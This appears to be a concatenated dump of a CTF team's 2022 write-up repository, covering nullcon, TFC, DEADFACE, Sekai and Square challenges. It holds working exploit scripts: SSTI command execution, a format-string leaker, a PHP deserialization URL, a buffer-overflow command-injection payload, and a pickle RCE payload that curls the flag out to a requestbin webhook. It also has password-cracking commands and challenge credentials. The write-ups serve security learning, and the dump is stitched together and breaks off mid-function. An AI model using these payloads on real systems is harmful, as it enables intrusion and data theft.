            if getattr(str, cf)(UnisLoveCode.username) == u:
                return False
        print("bypasses-1")
        for c in u:
            if c in string.ascii_uppercase:
                return False
        print("bypasses-2")
        print("u.upper:"+u.upper())
        return UnisLoveCode.username.upper() == u.upper()

    def do_POST(self):
        self.send_response(-1337)
        self.send_header('Content-Length', -1337)
        self.send_header('Content-Type', 'text/plain')
        s = StringIO()
        try:
            length = min(int(self.headers['content-length']), 64)
            field_data = self.rfile.read(length)
            fields = urllib.parse.parse_qs(field_data.decode("utf8"))
            if not 'username' in fields:
                s.write("Iaskedyouforausername!\n")
                raise Exception("Wrongparam.")
            username = fields['username'][0]
            if not self._check_access(username):
                s.write("No.\n")
                raise Exception("No.")
            s.write(f"OK,hereisyourflag:{FLAG}\n")
        except Exception as e:
            s.write("Tryharder;-)!\n")
            print(e)
        self.end_headers()
        self.wfile.write(s.getvalue().encode())


if __name__ == "__main__":
    PORT = 8000
    HANDLER = UnisLoveCode
    with socketserver.ThreadingTCPServer(("0.0.0.0", PORT), HANDLER) as httpd:
        print(f"http://localhost:{PORT}")
        httpd.serve_forever()

--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Unis Love Code/test.py:
--------------------------------------------------------------------------------
a="I"
# unicode character that produces the same result as the "I" in "ADMIN" once upper-cased
# but is not a valid ASCII character
# comparing it with "I" directly (as below) returns False;
# comparing b.upper() with "I" returns True
b = "\u0131"
# b = b.upper()
# print(bytes(b, "utf8"))
print(b)
print(a==b)

# payload username=admın
# http://www.unicode.org/Public/UNIDATA/CaseFolding.txt

--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/jsonify/flag.txt:
--------------------------------------------------------------------------------
test{flag}

--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/jsonify/index.php:
--------------------------------------------------------------------------------
flagfile = $flagfile;
        }
    }
    public function __shutdown()
    {
        return $this->properties;
    }
    public function __startup()
    {
        $this->readFlag();
    }
    public function __toString()
    {
        return "ClassFlag(" . $this->flag . ")";
    }
    public function setFlag($flag)
    {
        $this->flag = $flag;
    }
    public function getFlag()
    {
        return $this->flag;
    }
    public function setFlagFile($flagfile)
    {
        if (stristr($flagfile, "flag") || !file_exists($flagfile)) {
            echo "ERROR:Fileisnotvalid!";
            return;
        }
        $this->flagfile = $flagfile;
    }
    public function getFlagFile()
    {
        return $this->flagfile;
    }
    public function readFlag()
    {
        if (!isset($this->flag) && file_exists($this->flagfile)) {
            $this->flag = join("", file($this->flagfile));
        }
    }
    public function showFlag()
    {
        if ($this->isAllowedToSeeFlag) {
            echo "Theflagis:" . $this->flag;
        } else {
            echo "Theflagis:[You'renotallowedtoseeit!]";
        }
    }
}
function secure_jsonify($obj)
{
    $data = array();
    $data['class'] = get_class($obj);
    $data['properties'] = array();
    foreach ($obj->__shutdown() as &$key) {
        $data['properties'][$key] = serialize($obj->$key);
    }
    return json_encode($data);
}
function secure_unjsonify($json, $allowed_classes)
{
    $data = json_decode($json, true);
    if (!in_array($data['class'], $allowed_classes)) {
        throw new Exception("ErrorProcessingRequest", 1);
    }
    $obj = new $data['class']();
    foreach ($data['properties'] as $key => $value) {
        $obj->$key = unserialize($value, ['allowed_classes' => false]);
    }
    $obj->__startup();
    return $obj;
}
if (isset($_GET['show']) && isset($_GET['obj']) && isset($_GET['flagfile'])) {
    $f = secure_unjsonify($_GET['obj'], array('Flag'));
    $f->setFlagFile($_GET['flagfile']);
    $f->readFlag();
    $f->showFlag();
} elseif (isset($_GET['show'])) {
    $f = new Flag();
    $f->flagfile = "./flag.php";
    $f->readFlag();
    $f->showFlag();
} else {
    header("Content-Type:text/plain");
    echo preg_replace('/\s+/', '', str_replace("\n", '', file_get_contents("./index.php")));
}//With<3by@gehaxelt

--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/jsonify/test.php:
--------------------------------------------------------------------------------
flagfile = $flagfile;
        }
    }
    public function __shutdown()
    {
        return $this->properties;
    }
    public function __startup()
    {
        $this->readFlag();
    }
    public function __toString()
    {
        return "ClassFlag(" . $this->flag . ")";
    }
    public function setFlag($flag)
    {
        $this->flag = $flag;
    }
    public function getFlag()
    {
        return $this->flag;
    }
    public function setFlagFile($flagfile)
    {
        if (stristr($flagfile, "flag") || !file_exists($flagfile)) {
            echo "ERROR:Fileisnotvalid!";
            return;
        }
        $this->flagfile = $flagfile;
    }
    public function getFlagFile()
    {
        return $this->flagfile;
    }
    public function readFlag()
    {
        if (!isset($this->flag) && file_exists($this->flagfile)) {
            $this->flag = join("", file($this->flagfile));
        }
    }
    public function showFlag()
    {
        echo $this->isAllowedToSeeFlag;
        if ($this->isAllowedToSeeFlag) {
            echo "Theflagis:" . $this->flag;
        } else {
            echo "Theflagis:[You'renotallowedtoseeit!]";
        }
    }
}
function secure_jsonify($obj)
{
    $data = array();
    $data['class'] = get_class($obj);
    $data['properties'] = array();
    foreach ($obj->__shutdown() as &$key) {
        $data['properties'][$key] = serialize($obj->$key);
    }
    return json_encode($data);
}
function secure_unjsonify($json, $allowed_classes)
{
    $data = json_decode($json, true);
    if (!in_array($data['class'], $allowed_classes)) {
        throw new Exception("ErrorProcessingRequest", 1);
    }
    $obj = new $data['class']();
    foreach ($data['properties'] as $key => $value) {
        $obj->$key = unserialize($value, ['allowed_classes' => false]);
    }
    $obj->__startup();
    return $obj;
}

# make $this->isAllowedToSeeFlag to true, use unserialize vulnerability to get the flag, set flag value to setFlagFile('index.php');
$f->readFlag();
$f->showFlag();
// http://52.59.124.14:10002/?show=&obj={%22class%22:%22Flag%22,%22properties%22:{%22isAllowedToSeeFlag%22:%22b:1;%22,%22flagfile%22:%22s:8:\%22flag.php\%22;%22}}&flagfile=index.php
?>

--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/jsonify/test2.php:
--------------------------------------------------------------------------------

After the bypass, we try one of the common vulnerabilities usually found in web libraries for OOP programming languages, namely SSTI.

For the payload I took one from this website: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md

```python
import requests
import urllib.parse as up

URL = "http://01.linux.challenges.ctf.thefewchosen.com:57588"
class Exploit:
    def __init__(self, param, url=URL):
        self.session = requests.Session()
        # self.session.proxies = {'http': 'http://localhost:8080'}
        self.param = param
        self.url = url

    def payloadAndBypass(self, malcode):
        '''bypass regex expression with newline (e.g. \\n)'''
        bypass = "asd\n"
        payload = bypass+malcode
        return {"input":payload}

    def start(self):
        r = self.session.post(self.url, data=self.payloadAndBypass(self.param))
        return r.text


param = """<%= IO.popen('cat ./flag.txt').readlines() %>"""

n = Exploit(param=param).start()
print(n)
```
### References
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md


## ADDING IN PARTS
cat = forensics. After analysis, it turned out the CRC was invalid, so the data inside had probably changed. Fortunately only 1 byte had changed, so I wrote a script to brute-force the contents of the changed byte.

```python
from zipfile import BadZipFile, ZipFile

strings = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_}{"
a = 31
flag = ""
for i in range(0,22):
    f = open(f"{i}.zip", "rb").read()
    j = 0
    open("temp.zip", "wb").write(f)
    if i == 10:
        a = 32
        flag += "c"
        continue
    while len(flag) != i+1:
        try:
            zi = ZipFile("temp.zip", "r")
            flag += zi.read(f"{i}").decode()
            print("process", end="\r")
        except BadZipFile:
            f = f[:a] + strings[j].encode() + f[a+1:]
            open("temp.zip", "wb").write(f)
            j += 1

print(flag)
```
================
TFCCTF{ch3cksum2_g0od}

## GETENV

This time the vulnerability is a format string vulnerability, which lets us leak the flag stored in an environment variable by brute force.

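The bug class named above, shown as an added example rather than code from the challenge or the write-up: when a program passes user input as the printf format, a directive such as `%1$s` makes printf fetch an argument that was never supplied, which is what exposes process memory such as environment strings. `scan_format` and `echo_hardened` are hypothetical names, the scanner is a simplified audit helper, and because the challenge binary is not shown on the page the vulnerable call is assumed to have the usual `printf(user_input)` shape.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Result of auditing a string as if it were used as a printf format. */
struct fmt_scan {
    int conversions;   /* directives that would consume an argument */
    int max_position;  /* highest N seen in a positional "%N$" directive */
};

/* Skip a width or precision; each '*' takes an int argument of its own. */
static const char *skip_number(const char *s, struct fmt_scan *r)
{
    while (isdigit((unsigned char)*s) || *s == '*') {
        if (*s == '*')
            r->conversions++;
        s++;
    }
    return s;
}

/* Simplified walk over printf syntax: %[N$][flags][width][.prec][length]conv */
struct fmt_scan scan_format(const char *s)
{
    struct fmt_scan r = {0, 0};

    while (*s) {
        if (*s++ != '%')
            continue;
        if (*s == '%') {            /* "%%" prints a literal percent sign */
            s++;
            continue;
        }
        /* Positional prefix: digits followed by '$', e.g. "1$" in "%1$s". */
        const char *p = s;
        int n = 0;
        while (isdigit((unsigned char)*p) && n < 100000)
            n = n * 10 + (*p++ - '0');
        if (p != s && *p == '$') {
            if (n > r.max_position)
                r.max_position = n;
            s = p + 1;
        }
        while (*s && strchr("-+ #0'", *s))      /* flags */
            s++;
        s = skip_number(s, &r);                 /* width */
        if (*s == '.')                          /* precision */
            s = skip_number(s + 1, &r);
        while (*s && strchr("hlLqjzt", *s))     /* length modifiers */
            s++;
        if (*s && strchr("diouxXeEfFgGaAcspn", *s)) {   /* conversion */
            r.conversions++;
            s++;
        }
    }
    return r;
}

/* Vulnerable pattern (kept as a comment so nothing here invokes it):
 *     printf(user_input);      // the user's bytes are the format string
 * Hardened form: the format is a constant and the input is only data. */
int echo_hardened(char *out, size_t outlen, const char *user_input)
{
    return snprintf(out, outlen, "%s", user_input);
}

int main(void)
{
    /* Constructed sample inputs, not captured traffic. */
    const char *samples[] = { "hello", "100%% sure", "%1$s", "%42$s %x" };
    char out[64];

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct fmt_scan r = scan_format(samples[i]);
        echo_hardened(out, sizeof out, samples[i]);
        printf("input=[%s] conversions=%d max_position=%d echoed=[%s]\n",
               samples[i], r.conversions, r.max_position, out);
    }
    return 0;
}
```

Building with `-Wformat -Wformat-security` makes GCC and Clang warn when a non-literal string is passed as the format with no arguments.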

Here I use a parameter such as `%1$s` to leak the flag; we repeat this many times until the flag shows up.

Reference: [https://infosecwriteups.com/exploiting-format-string-vulnerability-97e3d588da1b](https://infosecwriteups.com/exploiting-format-string-vulnerability-97e3d588da1b)

```python
import pwn
import threading

# remove debug output
pwn.context.log_level = 'WARNING'

def brute_format_str(num, file):
    with pwn.remote('01.linux.challenges.ctf.thefewchosen.com', 58846) as r:
        try:
            payload = f"%{num}$s"
            p = r.recv(1000)
            p = r.sendline(payload)
            p = r.recv(1000)
        except:
            pass
        try:
            file.write(p)
        except:
            pass


with open("dump.txt", "ab") as f:
    for i in range(0,100):
        t = threading.Thread(target=brute_format_str, args=(i,f))
        t.start()
        if i % 10 == 0:
            t.join()
```
--------------------------------------------------------------------------------
/2022/deadface-ctf/README.md:
--------------------------------------------------------------------------------
# OSINT
## Under Public Scrutiny
Just search for the keyword github on https://ghosttown.deadface.io/

That turns up this thread: [https://ghosttown.deadface.io/t/made-a-github-link-for-projects/66](https://ghosttown.deadface.io/t/made-a-github-link-for-projects/66)

It says the GitHub account is deadf4c3.
There is 1 suspicious repo, got the flag: https://github.com/deadf4c3/tarrasque

## Grave Digger 1

For this challenge we need to SSH in as the user crypto\_vamp and then type env

```
crypto_vamp@1d2d67359e3a:/proc$ env
GRAVEDIGGER1=flag{d34dF4C3_en1roN_v4r}
HOSTNAME=1d2d67359e3a
PWD=/proc
HOME=/home/crypto_vamp
TERM=xterm
TMOUT=1600
SHLVL=1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env
OLDPWD=/
```

# REV
## Monstrosity
We are given a binary file. What is unusual here is that the program's sections are encrypted and are decrypted at runtime. Just dump it with gdb to get a binary that can be analyzed.

The program asks for input and runs a check on that input:

As can be seen, the user input is compared with the variable v13,
and here v13 is encrypted with XOR 0x1e:

After decrypting with CyberChef, we get the answer and got the flag.

## Cereal Killer 02 (REV)
We are given a .NET program in which the flag is encrypted with AES using the answer. The answer is validated with MD5, where the MD5 is aee1ee5262757cf67b619ff63e9672b6. After using CrackStation to look up the answer, the result is peanutbuttercrunch. Enter the flag and boom, got flag.


# PWN
## Easy Creds
For this challenge we only need to use john

```bash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt
```

To identify the hash type I used https://hashes.com/en/tools/hash_identifier

## Crack Database
We are given a KeePass file, which we will crack with john; the problem is that we don't know which wordlist to use.

We try searching Ghost Town: https://ghosttown.deadface.io
It turns out that in the post More Bitcoin`$$$$$` a user named mirveal shares wordlists, so we use those to crack the password.
The password we get is complexpassword

Open the file in KeePass and copy the password from the entry titled PWN07-....
flag{breaking_the_law}

## Grave Digger 2

We need to log in over SSH as in Grave Digger 1

```
ssh crypto_vamp@env.deadface.io
# password: 123456789q
```

Read the file gravedigger2 using

```
/opt/reader -f gravedigger2
```

A QR code will then appear; scan the QR code and you get the flag.

# crypto
## Two Dead Boys

We are given a string encrypted with Vigenère

"qlsn{Pvelnnad Aumjcnyg: Ibrwpaty ENLECPZNYG!}"

Since we already know the first 4 letters, we can use the known-plaintext feature on dcode.fr; just use brute-force mode and the flag appears.

flag{Critical Thinking: Question EVERYTHING!}

## "D" is for Dumb Mistakes

p = 1049
q = 2063
e = 777887

To get d, the private key, we can use the modular inverse function in gmpy2 or use dcode.fr

N = (p-1)\*(q-1)
d = inverse(e, N)
d = 1457215

flag{d=1457215}

## "D" is for Decryption

This is still related to the first challenge, but this time we are given ciphertext to decrypt, and the result is numbers that represent positions in the alphabet.

The script:
```python
from Crypto.Util.number import inverse, long_to_bytes

p = 1049
q = 2063
e = 777887
d = 1457215
n = p*q

data = [992478,1726930,1622358,1635603,1385290]

flag = []
for i in data:
    flag +=long_to_bytes(pow(i,d,n))

print('flag{',end="")
for i in flag: print(chr(64+i).lower(),end="")
print('}')
```


# stegano
## The Goodest Boy
We are given a picture of a DOG! lol. Looking at its strings, there is ASCII text reading password:borkbork

Trying to extract with the steghide tool, it turns out there is a PDF containing the flag
flag{whos_A_g00d_boi_bork_bork}

# SQL
## Counting heads
We are given a .sql file; import the SQL, open the database, and enter the query. flag{2400}

## The Faculty
A continuation of the previous SQL challenge; enter the query

```sql
select count(r.user_id) from roles_assigned r join users u on r.user_id=u.user_id where not role_id=1;
```

flag{627}

## Let's Hash It Out
The clue says DEADFACE is targeting a user; look up that user's password.

Searching https://ghosttown.deadface.io/ turns up the post Database Question. Next we look for which user is meant, which turns out to be the Administration role, so we then query the password field for the Administration role.

flag{b487af41779cffb9572b982e1a0bf83f0eafbe05}

## Fall Classes
The question asks how many unique spring classes there are.
Write the query directly:

```sql
select count(distinct tc.course_id) from terms t join term_courses tc on t.term_id=tc.term_id where t.term_id=2;
```

flag{405}

# Bonus

## Contact

In the SSH session as the user crypto\_vamp, we run man reader to view the manual of the program made by lilith

```
crypto_vamp@3e71a870077f:/home/spookyboi$ man reader
man(8)                         reader man page                         man(8)

NAME
       reader - read files as lilith

SYNOPSIS
       reader [OPTIONS] [FILENAME]

DESCRIPTION
       reader is developed to help crypto_vamp and other new recruits read privileged files until their vetting process is complete.

OPTIONS
       -f, --file FILENAME
              Read the contents of FILENAME.

       -c, --command COMMAND
              Execute a command (for troubleshooting purposes ONLY).

       -h, --help
              View the help information.

       -v, --version
              View the version information.

BUGS   No known bugs.

AUTHOR
       Lilith (bl0ody_mary@deadface.io)

1.3.1
```

There we find lilith's email address.
image 20221023145105.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023153937.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023153937.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154016.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154016.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154059.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154059.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154120.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154120.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154451.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154451.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154508.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154508.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154544.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154544.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154728.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154728.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154928.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154928.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154942.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154942.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023155120.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 
20221023155120.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023155211.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023155211.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023155218.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023155218.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211192759.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192759.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211192912.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192912.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211192926.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192926.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211192941.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192941.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211192953.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192953.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211193146.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211193146.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211193234.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211193234.png -------------------------------------------------------------------------------- /2022/sekai-ctf/Pasted image 20221004173301.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/sekai-ctf/Pasted image 20221004173301.png -------------------------------------------------------------------------------- /2022/sekai-ctf/Pasted image 20221004173340.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/sekai-ctf/Pasted image 20221004173340.png
--------------------------------------------------------------------------------
/2022/sekai-ctf/README.md:
--------------------------------------------------------------------------------
# Bottle Poem
Vulnerability: LFI plus pickle deserialization RCE in the Python bottle library

First we need to find out where the program is located:

```http
GET /show?id=/proc/thread-self/cmdline HTTP/1.1
```

After that I tried to read every file there through the LFI, including:

- ./config/secret.py: here I found the key used to encode the "name" cookie
- ./app.py: this is the main application
- ./views/\

I tried to replicate the program using the files I had found and ran it on localhost.
After looking at the source code of app.py for a long time, I began to suspect that the vulnerability was not in app.py but in the bottle library.

Looking at the source code of bottle.py, we can see the function
```python
def get_cookie(self, key, default=None, secret=None):
    """ Return the content of a cookie. To read a `Signed Cookie`, the
        `secret` must match the one used to create the cookie (see
        :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
        cookie or wrong signature), return a default value. """
    value = self.cookies.get(key)
    if secret and value:
        dec = cookie_decode(value, secret) # (key, value) tuple or None
        return dec[1] if dec and dec[0] == key else default
    return value or default
```
and
```python
def cookie_decode(data, key):
    ''' Verify and decode an encoded string. Return an object or None.'''
    data = tob(data)
    if cookie_is_encoded(data):
        sig, msg = data.split(tob('?'), 1)
        if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())):
            return pickle.loads(base64.b64decode(msg))
    return None
```

My eyes went straight to the pickle library, which is Python's serialization and deserialization module. I searched on Google and found this: [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)

## Exploitation
I slightly modified the source code of app.py by slipping in a pickle RCE payload

```python
...snip..
@route("/sign")
def index():
    try:
        COMMAND = """curl -X POST -d "fizz=`/flag`" https://requestbin.io/19b9tzf1"""
        class PickleRce(object):
            def __reduce__(self):
                import os
                return (os.system,(COMMAND,))
        session = request.get_cookie("name", secret=sekai)
        if not session or session["name"] == "guest":
            session = {"name": PickleRce()}
            response.set_cookie("name", session, secret=sekai)
            return template("guest", name=session["name"])
        if session["name"] == "admin":
            return template("admin", name=session["name"])
    except:
        return "pls no hax"
...snip...
```

Run it on localhost, go to "localhost:\ /sign", then copy the cookie

Put that cookie into "http://bottle-poem.ctf.sekai.team/sign"

and boom, we get the flag from our webhook

-------------------------------------------------------------------------------- /2022/square-ctf-2022/Pasted image 20221121074934.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121074934.png -------------------------------------------------------------------------------- /2022/square-ctf-2022/Pasted image 20221121074939.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121074939.png -------------------------------------------------------------------------------- /2022/square-ctf-2022/Pasted image 20221121075018.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121075018.png -------------------------------------------------------------------------------- /2022/square-ctf-2022/Pasted image 20221121075102.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121075102.png
--------------------------------------------------------------------------------
/2022/square-ctf-2022/README.md:
--------------------------------------------------------------------------------
# pwn
## ez-pwn-1
### tldr;
We are given the source code:
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


int main()
{
    char command[16];
    char way_too_small_input_buf[8];
    strcpy(command, "ls");

    puts("Hi! would you like me to ls the current directory?");
    read(0, way_too_small_input_buf, 24);
    if (!strcmp(way_too_small_input_buf, "no\n")) {
        puts("Oh, ok :(");
        exit(0);
    }

    puts("Ok, here ya go!\n");
    system(command);

}
```

It is just a regular BOF. Payload: aaaabaaacd th*;ls;cat f*

flag: flag{congrats_youve_exploited_a_memory_corruption_vulnerability}

# web
## xark
In this challenge we are given the source code, which is a JS program.
```js
...snip...
const app = express();
const port = 3001;
const knex = require('knex')(config.get('knex'));
...snip...
```

The program uses knex as the module that handles its MySQL queries.
https://github.com/knex/knex/issues/1227

TL;DR: knex has an old vulnerability that lets us change the query the program builds with knex by sending application/json POST requests. For example, if we send a body like the one below:

```json
{"to": {"message":"the flag is here!"}}
```

it becomes

#### exploitation
So, to get the flag that is stored by the query below:

```js
...snip...
        knex('crushes').insert({
            from: config.init.flag,
            to: config.init.flag,
            message: 'This is the flag!',
        }).then();
    }
});
...snip...
```

we can send an application/json POST request to the endpoint POST /data HTTP/1.1

-------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319104150.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319104150.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319174935.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319174935.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319174951.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319174951.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319180942.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319180942.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319194044.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319194044.png
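In the Bottle Poem write-up above (/2022/sekai-ctf/README.md), a leaked cookie secret becomes code execution because the quoted `cookie_decode` passes the cookie body to `pickle.loads` once the HMAC matches. The block below is an added example, not code from Bottle or from the write-up: a signed-cookie codec that carries JSON instead of pickle and signs with HMAC-SHA256, plus a triage helper that lists import/call opcodes in a legacy pickled cookie without unpickling it. All function names, the secret and the sample cookies are constructed for illustration.

```python
import base64
import hashlib
import hmac
import json
import pickle
import pickletools

# Opcodes that let a pickle import a callable or build an object during loads().
DANGEROUS_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def sign(secret: bytes, msg: bytes) -> bytes:
    """HMAC-SHA256 over the encoded body (the code quoted above uses HMAC-MD5)."""
    return base64.b64encode(hmac.new(secret, msg, hashlib.sha256).digest())


def encode_cookie(name: str, value, secret: bytes) -> bytes:
    """Return b'!<sig>?<body>' where body is base64(JSON [name, value])."""
    body = base64.b64encode(json.dumps([name, value]).encode())
    return b"!" + sign(secret, body) + b"?" + body


def decode_cookie(name: str, data: bytes, secret: bytes, default=None):
    """Verify the signature, then parse the body as JSON. Never unpickles."""
    if not data.startswith(b"!") or b"?" not in data:
        return default
    sig, body = data[1:].split(b"?", 1)
    if not hmac.compare_digest(sig, sign(secret, body)):
        return default
    try:
        parsed = json.loads(base64.b64decode(body, validate=True))
    except ValueError:  # bad base64, bad UTF-8 or bad JSON
        return default
    if not (isinstance(parsed, list) and len(parsed) == 2 and parsed[0] == name):
        return default
    return parsed[1]


def audit_legacy_cookie(data: bytes) -> list:
    """List dangerous opcodes in a '!sig?base64(pickle)' cookie without loading it."""
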